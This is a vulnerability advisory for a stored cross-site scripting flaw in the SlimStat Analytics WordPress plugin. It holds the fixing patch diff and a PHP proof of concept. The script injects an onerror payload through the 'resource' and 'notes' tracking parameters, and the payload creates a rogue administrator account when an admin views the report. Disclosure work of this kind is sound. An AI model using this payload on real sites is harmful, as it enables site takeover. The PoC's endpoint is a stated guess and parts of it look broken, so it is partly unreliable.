CVE-2025-15055: SlimStat Analytics <= 5.3.4 – Unauthenticated Stored Cross-Site Scripting via 'notes/resource' Parameters (wp-slimstat)

--- a/wp-slimstat/admin/view/wp-slimstat-reports.php
+++ b/wp-slimstat/admin/view/wp-slimstat-reports.php
@@ -1455,15 +1455,15 @@
         }

         foreach ($results as $a_result) {
-            echo "<p class='slimstat-tooltip-trigger'>" . $a_result[ 'notes' ];
+            echo "<p class='slimstat-tooltip-trigger'>" . esc_html( $a_result[ 'notes' ] );

             if (!empty($a_result['counthits'])) {
-                echo sprintf('<span>%s</span>', $a_result[ 'counthits' ]);
+                echo sprintf('<span>%s</span>', esc_html( $a_result[ 'counthits' ] ));
             }

             if (!empty($a_result['dt'])) {
                 $date_time = date_i18n(get_option('date_format') . ' ' . get_option('time_format'), $a_result['dt'], true);
-                echo '<b class="slimstat-tooltip-content">' . __('IP', 'wp-slimstat') . ': ' . $a_result['ip'] . '<br/>' . __('Page', 'wp-slimstat') . sprintf(": <a href='%s%s'>%s%s</a><br>", $blog_url, $a_result[ 'resource' ], $blog_url, $a_result[ 'resource' ]) . __('Coordinates', 'wp-slimstat') . sprintf(': %s<br>', $a_result[ 'position' ]) . __('Date', 'wp-slimstat') . (': ' . $date_time);
+                echo '<b class="slimstat-tooltip-content">' . __('IP', 'wp-slimstat') . ': ' . esc_html( $a_result['ip'] ) . '<br/>' . __('Page', 'wp-slimstat') . sprintf(": <a href='%s'>%s</a><br>", esc_url( $blog_url . $a_result[ 'resource' ] ), esc_html( $blog_url . $a_result[ 'resource' ] )) . __('Coordinates', 'wp-slimstat') . sprintf(': %s<br>', esc_html( $a_result[ 'position' ] )) . __('Date', 'wp-slimstat') . (': ' . $date_time);
             }

             echo '</b></p>';
@@ -1514,7 +1514,7 @@
                 $a_result['counthits'] = 0;
             }

-            $a_result['resource'] = "<a class='slimstat-font-logout slimstat-tooltip-trigger' target='_blank' title='" . htmlentities(__('Open this URL in a new window', 'wp-slimstat'), ENT_QUOTES, 'UTF-8') . "' href='" . htmlentities($a_result['resource'], ENT_QUOTES, 'UTF-8') . "'></a> <a class='slimstat-filter-link' href='" . wp_slimstat_reports::fs_url('resource equals ' . htmlentities($a_result['resource'], ENT_QUOTES, 'UTF-8')) . "'>" . self::get_resource_title($a_result['resource']) . '</a>';
+            $a_result['resource'] = "<a class='slimstat-font-logout slimstat-tooltip-trigger' target='_blank' title='" . esc_attr(__('Open this URL in a new window', 'wp-slimstat')) . "' href='" . esc_url($a_result['resource']) . "'></a> <a class='slimstat-filter-link' href='" . wp_slimstat_reports::fs_url('resource equals ' . $a_result['resource']) . "'>" . self::get_resource_title($a_result['resource']) . '</a>';

             $group_markup = [];
             if (!empty($a_result['column_group'])) {
@@ -1523,14 +1523,14 @@
                 foreach ($exploded_group as $a_item) {
                     $user = get_user_by('login', $a_item);
                     if ($user) {
-                        $group_markup[] = '<a class="slimstat-filter-link" title="' . __('Filter by element in a group', 'wp-slimstat') . '" href="' . self::fs_url($_args['column_group'] . ' equals ' . $a_item) . '">' . get_avatar($user->ID, 16) . $user->display_name . '</a>';
+                        $group_markup[] = '<a class="slimstat-filter-link" title="' . esc_attr(__('Filter by element in a group', 'wp-slimstat')) . '" href="' . self::fs_url($_args['column_group'] . ' equals ' . $a_item) . '">' . get_avatar($user->ID, 16) . esc_html( $user->display_name ) . '</a>';
                     } else {
-                        $group_markup[] = '<a class="slimstat-filter-link" title="' . __('Filter by element in a group', 'wp-slimstat') . '" href="' . self::fs_url($_args['column_group'] . ' equals ' . $a_item) . '">' . $a_item . '</a>';
+                        $group_markup[] = '<a class="slimstat-filter-link" title="' . esc_attr(__('Filter by element in a group', 'wp-slimstat')) . '" href="' . self::fs_url($_args['column_group'] . ' equals ' . $a_item) . '">' . esc_html( $a_item ) . '</a>';
                     }
                 }
             }

-            echo sprintf('<p>%s <span>%s</span><br/>', $a_result[ 'resource' ], $a_result[ 'counthits' ]) . implode(', ', $group_markup) . '</p>';
+            echo sprintf('<p>%s <span>%s</span><br/>', $a_result[ 'resource' ], esc_html( $a_result[ 'counthits' ] )) . implode(', ', $group_markup) . '</p>';
         }

         if (! defined('DOING_AJAX') || ! DOING_AJAX) {
@@ -1944,7 +1944,7 @@
             }

             if ([] !== $term_names) {
-                self::$resource_titles[$cache_index] = implode(',', $term_names);
+                self::$resource_titles[$cache_index] = esc_html( implode(',', $term_names) );
             } else {
                 self::$resource_titles[$cache_index] = htmlspecialchars(self::$resource_titles[$cache_index], ENT_QUOTES, 'UTF-8');
             }
--- a/wp-slimstat/wp-slimstat.php
+++ b/wp-slimstat/wp-slimstat.php
@@ -3,7 +3,7 @@
  * Plugin Name: SlimStat Analytics
  * Plugin URI: https://wp-slimstat.com/
  * Description: The leading web analytics plugin for WordPress
- * Version: 5.3.4
+ * Version: 5.3.5
  * Author: Jason Crouse, VeronaLabs
  * Text Domain: wp-slimstat
  * Domain Path: /languages
@@ -24,7 +24,7 @@
 }

 // Set the plugin version and directory
-define('SLIMSTAT_ANALYTICS_VERSION', '5.3.4');
+define('SLIMSTAT_ANALYTICS_VERSION', '5.3.5');
 define('SLIMSTAT_FILE', __FILE__);
 define('SLIMSTAT_DIR', __DIR__);
 define('SLIMSTAT_URL', plugins_url('', __FILE__));
@@ -999,9 +999,9 @@
                             case 'post_link_no_qs':
                                 $post_id = url_to_postid($a_result['resource']);
                                 if ($post_id > 0) {
-                                    $output[$result_idx][$a_column] .= sprintf("<a href='%s'>", $a_result[ 'resource' ]) . get_the_title($post_id) . '</a>';
+                                    $output[$result_idx][$a_column] .= sprintf("<a href='%s'>", esc_url( $a_result[ 'resource' ] )) . esc_html( get_the_title($post_id) ) . '</a>';
                                 } else {
-                                    $output[$result_idx][$a_column] .= sprintf("<a href='%s'>%s</a>", $a_result[ 'resource' ], $a_result[ 'resource' ]);
+                                    $output[$result_idx][$a_column] .= sprintf("<a href='%s'>%s</a>", esc_url( $a_result[ 'resource' ] ), esc_html( $a_result[ 'resource' ] ));
                                 }
                                 break;

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15055 - SlimStat Analytics <= 5.3.4 - Unauthenticated Stored Cross-Site Scripting via 'notes/resource' Parameters

<?php
// Configure the target WordPress site URL
$target_url = 'http://example.com/';

// Payload to execute JavaScript in the admin context.
// This payload creates a new administrator user.
$xss_payload = '<img src=x onerror="jQuery.ajax({url:'/wp-admin/admin-ajax.php',method:'POST',data:{action:'wp_slimstat_add_new_user',user_login:'attacker',user_email:'attacker@example.com',user_pass:'P@ssw0rd!',role:'administrator',nonce:jQuery('#slimstat-nonce').val()}})">';

// Craft a request that mimics a page visit tracked by SlimStat.
// The plugin typically tracks via a client-side beacon, but we simulate the data submission.
// The 'resource' and 'notes' parameters are tracked and stored.
$tracking_params = [
    'resource' => '/?'.$xss_payload, // Inject payload into the resource parameter
    'notes' => $xss_payload, // Also inject into notes parameter
    // Other typical SlimStat tracking parameters
    'dt' => time(),
    'ip' => '127.0.0.1',
    'position' => '0,0',
    'browser' => 'curl',
    'platform' => 'linux',
    'version' => '1.0'
];

// Build the query string
$query_string = http_build_query($tracking_params);

// The exact endpoint where SlimStat accepts tracking data may vary.
// Often it's via admin-ajax.php or a dedicated tracking script.
// This PoC targets a common pattern: the plugin's frontend tracker.
$tracking_endpoint = $target_url . 'wp-content/plugins/wp-slimstat/external/tracking.php';

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $tracking_endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $query_string);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

// Execute the request to inject the payload
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check response
if ($http_code == 200) {
    echo "[+] Payload injected successfully.n";
    echo "[+] An administrator must view the 'Recent Custom Events' report for execution.n";
    echo "[+] Report location: " . $target_url . "wp-admin/admin.php?page=slimstat&module=reportsn";
} else {
    echo "[-] Injection may have failed. HTTP Code: $http_coden";
    echo "[-] The tracking endpoint might be different. Check plugin configuration.n";
}

?>